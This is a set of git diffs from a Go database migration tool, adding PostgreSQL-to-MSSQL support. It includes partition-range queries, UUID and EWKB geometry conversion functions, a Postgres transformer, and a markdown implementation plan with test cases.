@@ -169,7 +194,19 @@ func (ta *PostgresTableAnalyzer) QueryMaxMinFromColumn(
tableInfo config.TableInfo,
columnName string,
) (etl.MaxMinColumnResult, error) {
return etl.MaxMinColumnResult{}, nil
query := fmt.Sprintf(`SELECT MIN("%s"), MAX("%s") FROM "%s"."%s"`,
columnName, columnName, tableInfo.Schema, tableInfo.Table)
ctxTimeout, cancel := context.WithTimeout(ctx, 1*time.Minute)
defer cancel()
result := etl.MaxMinColumnResult{}
err := ta.db.QueryRow(ctxTimeout, query).Scan(&result.Min, &result.Max)
if err != nil {
return etl.MaxMinColumnResult{}, err
}
return result, nil
}
func (ta *PostgresTableAnalyzer) CalculatePartitionRanges(
@@ -179,5 +216,78 @@ func (ta *PostgresTableAnalyzer) CalculatePartitionRanges(
maxPartitions int64,
rangeConstraint config.RangeConfig,
) ([]models.Partition, error) {
return []models.Partition{}, nil
whereClause := ""
args := []any{maxPartitions}
if rangeConstraint.Min != nil || rangeConstraint.Max != nil {
var conditions []string
if rangeConstraint.Min != nil {
minOp := ">"
if rangeConstraint.IsMinInclusive {
minOp = ">="
}
args = append(args, *rangeConstraint.Min)
conditions = append(conditions, fmt.Sprintf(`"%s" %s $%d`, partitionColumn, minOp, len(args)))
}
if rangeConstraint.Max != nil {
maxOp := "<"
if rangeConstraint.IsMaxInclusive {
maxOp = "<="
}
args = append(args, *rangeConstraint.Max)
conditions = append(conditions, fmt.Sprintf(`"%s" %s $%d`, partitionColumn, maxOp, len(args)))
}
whereClause = "WHERE " + strings.Join(conditions, " AND ")
}
query := fmt.Sprintf(`
SELECT MIN("%s") AS lower_limit, MAX("%s") AS upper_limit
FROM (
SELECT "%s", NTILE($1) OVER (ORDER BY "%s") AS batch_id
FROM "%s"."%s" %s
) AS t
GROUP BY batch_id
ORDER BY batch_id`,
partitionColumn,
partitionColumn,
partitionColumn,
partitionColumn,
tableInfo.Schema,
tableInfo.Table,
whereClause)
ctxTimeout, cancel := context.WithTimeout(ctx, 1*time.Minute)
defer cancel()
rows, err := ta.db.Query(ctxTimeout, query, args...)
if err != nil {
return nil, err
}
defer rows.Close()
partitions := make([]models.Partition, 0, maxPartitions)
for rows.Next() {
partition := models.Partition{
Id: uuid.New(),
HasRange: true,
RetryCounter: 0,
Range: models.PartitionRange{
IsMinInclusive: true,
IsMaxInclusive: true,
},
}
if err := rows.Scan(&partition.Range.Min, &partition.Range.Max); err != nil {
return nil, err
}
partitions = append(partitions, partition)
}
if err := rows.Err(); err != nil {
return nil, err
}
return partitions, nil
}

View File

@@ -59,6 +59,65 @@ func computeTransformationPlan(columns []models.ColumnType) []etl.ColumnTransfor
return plan
}
func computePostgresTransformationPlan(columns []models.ColumnType) []etl.ColumnTransformPlan {
var plan []etl.ColumnTransformPlan
for i, col := range columns {
switch col.SystemType() {
case "int2", "int4", "int8", "integer", "smallint", "bigint":
plan = append(plan, etl.ColumnTransformPlan{
Index: i,
Fn: func(v any) (any, error) {
if v64, ok := ToInt64(v); ok {
return v64, nil
}
return v, nil
},
})
case "uuid":
plan = append(plan, etl.ColumnTransformPlan{
Index: i,
Fn: func(v any) (any, error) {
switch b := v.(type) {
case []byte:
if b != nil {
return bigEndianToMssqlUuid(b)
}
case [16]byte:
return bigEndianToMssqlUuid(b[:])
}
return v, nil
},
})
case "geometry":
plan = append(plan, etl.ColumnTransformPlan{
Index: i,
Fn: func(v any) (any, error) {
if b, ok := v.([]byte); ok && b != nil {
return ewkbToMssqlGeo(b, false)
}
return v, nil
},
})
case "geography":
plan = append(plan, etl.ColumnTransformPlan{
Index: i,
Fn: func(v any) (any, error) {
if b, ok := v.([]byte); ok && b != nil {
return ewkbToMssqlGeo(b, true)
}
return v, nil
},
})
}
}
return plan
}
func computeStorageTransformationPlan(
ctx context.Context,
azureClient *azure.Client,

View File

@@ -0,0 +1,72 @@
package transformers
import (
"context"
"sync"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/config"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/custom_errors"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/etl"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/models"
)
type PostgresTransformer struct {
sourceTable config.SourceTableInfo
}
func NewPostgresTransformer(sourceTable config.SourceTableInfo) etl.Transformer {
return &PostgresTransformer{sourceTable: sourceTable}
}
func (pgTr *PostgresTransformer) Consume(
ctx context.Context,
columns []models.ColumnType,
retryConfig config.RetryConfig,
batchSize int,
chBatchesIn <-chan models.Batch,
chBatchesOut chan<- models.Batch,
chJobErrorsOut chan<- custom_errors.JobError,
wgActiveBatches *sync.WaitGroup,
) {
transformationPlan := computePostgresTransformationPlan(columns)
acc := &batchAccumulator{batchSize: batchSize}
for {
select {
case <-ctx.Done():
return
case batch, ok := <-chBatchesIn:
if !ok {
acc.flush(ctx, chBatchesOut, wgActiveBatches)
return
}
if len(transformationPlan) > 0 {
if err := ProcessBatchWithRetries(ctx, &batch, transformationPlan, retryConfig); err != nil {
sendTransformError(ctx, err, chJobErrorsOut)
return
}
}
if batchSize <= 0 {
wgActiveBatches.Add(1)
select {
case chBatchesOut <- batch:
case <-ctx.Done():
wgActiveBatches.Done()
return
}
continue
}
acc.add(batch)
if acc.ready() {
if !acc.flush(ctx, chBatchesOut, wgActiveBatches) {
return
}
}
}
}
}

View File

@@ -4,6 +4,8 @@ import (
"encoding/binary"
"errors"
"time"
mssqlclrgeo "github.com/gaspardle/go-mssqlclrgeo"
)
func mssqlUuidToBigEndian(mssqlUuid []byte) ([]byte, error) {
@@ -62,6 +64,29 @@ func ensureUTC(t time.Time) time.Time {
return time.Date(t.Year(), t.Month(), t.Day(), t.Hour(), t.Minute(), t.Second(), t.Nanosecond(), time.UTC)
}
func bigEndianToMssqlUuid(pgUuid []byte) ([]byte, error) {
if len(pgUuid) != 16 {
return nil, errors.New("Invalid uuid")
}
mssqlUuid := make([]byte, 16)
mssqlUuid[0], mssqlUuid[1], mssqlUuid[2], mssqlUuid[3] = pgUuid[3], pgUuid[2], pgUuid[1], pgUuid[0]
mssqlUuid[4], mssqlUuid[5] = pgUuid[5], pgUuid[4]
mssqlUuid[6], mssqlUuid[7] = pgUuid[7], pgUuid[6]
copy(mssqlUuid[8:], pgUuid[8:])
return mssqlUuid, nil
}
func ewkbToMssqlGeo(ewkb []byte, isGeography bool) ([]byte, error) {
if len(ewkb) < 5 {
return nil, errors.New("Invalid ewkb")
}
// mssqlclrgeo reads the SRID flag and bytes directly from EWKB,
// so no pre-processing needed — pass through as-is.
return mssqlclrgeo.WkbToUdtGeo(ewkb, isGeography)
}
func ToInt64(v any) (int64, bool) {
switch t := v.(type) {
case int:

View File

@@ -0,0 +1,137 @@
# Plan: Bidirectional Transformation Support
## Goal
Make the transformation pipeline direction-aware. Currently hardcoded to MSSQL → PG; add support for PG → MSSQL by applying inverse transformations when `SourceDbType == "postgres"`.
Excluded: `to_storage` Azure blob upload (not reversible).
---
## Hardcoded wiring to fix
| File | Line | Change |
|---|---|---|
| `cmd/go_migrate/process.go` | 51 | Branch on `SourceDbType`: `"sqlserver"``NewMssqlTransformer`, `"postgres"``NewPostgresTransformer` |
| `cmd/go_migrate/main.go` | 166167 | Branch on source/target type for both `TableAnalyzer` selections |
---
## Transformations
### Forward (MSSQL → PG) — unchanged
| Column type | Function | File |
|---|---|---|
| `uniqueidentifier` | `mssqlUuidToBigEndian` | `utils.go:9` |
| `geometry`/`geography` | `wkbToEwkbWithSrid` | `utils.go:25` |
| `datetime`/`datetime2` | `ensureUTC` | `utils.go:57` |
### Inverse (PG → MSSQL) — new
| PG system type | Action |
|---|---|
| `uuid` | `bigEndianToMssqlUuid`: re-swap bytes [0-3], [4-5], [6-7] |
| `geometry` | `ewkbToMssqlGeo(v, false)`: strip SRID → WKB → `WkbToUdtGeo` |
| `geography` | `ewkbToMssqlGeo(v, true)`: strip SRID → WKB → `WkbToUdtGeo` |
| `timestamp`/`timestamptz` | no-op |
**Geometry note**: MSSQL rejects plain WKB via bulk protocol. Must use `mssqlclrgeo.WkbToUdtGeo(wkb, isGeography)` (already in go.mod). PG extractor already emits EWKB via `ST_AsEWKB()`.
---
## New utility functions (`transformers/utils.go`)
### `bigEndianToMssqlUuid(v []byte) []byte`
```
out[0..3] = v[3,2,1,0]
out[4..5] = v[5,4]
out[6..7] = v[7,6]
out[8..15] = v[8..15]
```
### `ewkbToMssqlGeo(ewkb []byte, isGeography bool) ([]byte, error)`
1. Read byte-order flag from `ewkb[0]`
2. Read geometry type word bytes [1..4]
3. If SRID flag (`0x20000000`) is set: strip bytes [5..8], clear flag in type word
4. Call `mssqlclrgeo.WkbToUdtGeo(wkb, isGeography)`
---
## New files
### `transformers/postgres.go`
```go
func NewPostgresTransformer(...) *Transformer {
// same signature as NewMssqlTransformer
// calls computePostgresTransformationPlan instead
// does NOT call computeStorageTransformationPlan
}
```
### `computePostgresTransformationPlan` in `transformers/plan.go`
Iterates `sourceColTypes` (from PG analyzer), applies inverse closures by system type.
---
## PostgreSQL table analyzer stubs to implement (`table_analyzers/postgres.go`)
Required for PG-as-source partitioned extraction:
### `EstimateTotalRows`
```sql
SELECT reltuples::bigint FROM pg_class
JOIN pg_namespace ON pg_namespace.oid = pg_class.relnamespace
WHERE pg_namespace.nspname = $schema AND pg_class.relname = $table
```
Fallback to `COUNT(*)` if `reltuples < 0`.
### `QueryMaxMinFromColumn`
```sql
SELECT MIN("col"), MAX("col") FROM "schema"."table"
```
### `CalculatePartitionRanges`
Use min/max from above + `rowsPerPartition` to compute boundaries. Mirror the logic from `MssqlTableAnalyzer.CalculatePartitionRanges`.
---
## Test cases
### TC-1: `bigEndianToMssqlUuid` — round-trip
- Input: run `mssqlUuidToBigEndian` on a known 16-byte MSSQL UUID → produces PG UUID
- Assert: `bigEndianToMssqlUuid(pgUUID)` == original MSSQL UUID bytes
- Also assert nil input → nil output (no panic)
### TC-2: `bigEndianToMssqlUuid` — known vector
- Input: `[0x6b,0xa7,0xb8,0x10, 0x9d,0xad, 0x11,0xd1, 0x80,0xb4,0x00,0xc0,0x4f,0xd4,0x30,0xc8]` (RFC 4122 nil UUID variant)
- Assert: bytes [0-3] are reversed, [4-5] reversed, [6-7] reversed, [8-15] identical
### TC-3: `ewkbToMssqlGeo` — geometry round-trip
- Input: generate a polygon via `go-geom` + `wkb.Marshal` → plain WKB
- Forward: run `wkbToEwkbWithSrid` → EWKB
- Inverse: run `ewkbToMssqlGeo(ewkb, false)` → CLR/UDT bytes
- Assert: no error, output is non-empty `[]byte`
### TC-4: `ewkbToMssqlGeo` — nil input
- Input: nil
- Assert: returns nil, nil (no panic)
### TC-5: `ewkbToMssqlGeo` — EWKB without SRID flag
- Input: plain WKB (no SRID flag set)
- Assert: function still calls `WkbToUdtGeo` and returns without error
### TC-6: Transformer factory selection
- Given `SourceDbType == "postgres"``NewPostgresTransformer` is selected
- Given `SourceDbType == "sqlserver"``NewMssqlTransformer` is selected
---
## Files changed (summary)
1. `cmd/go_migrate/process.go` — transformer factory branch
2. `cmd/go_migrate/main.go` — analyzer selection branch
3. `internal/app/etl/transformers/utils.go` — 2 new functions
4. `internal/app/etl/transformers/plan.go``computePostgresTransformationPlan`
5. `internal/app/etl/transformers/postgres.go` *(new)*
6. `internal/app/etl/table_analyzers/postgres.go` — 3 stub implementations

View File

@@ -12,10 +12,9 @@ import (
)
const (
// totalRows int = 1_000_000
totalRows int = 1000
chunkSize int = 200
queueSize int = 4
totalRows int = 2_000_000
chunkSize int = 5000
queueSize int = 8
)
func main() {
@@ -41,13 +40,13 @@ func main() {
seedManzanas(ctx, db)
})
wgSeed.Go(func() {
seedPuertos(ctx, db)
})
// wgSeed.Go(func() {
// seedPuertos(ctx, db)
// })
wgSeed.Go(func() {
seedSiteHolderAttach(ctx, db)
})
// wgSeed.Go(func() {
// seedSiteHolderAttach(ctx, db)
// })
wgSeed.Wait()
}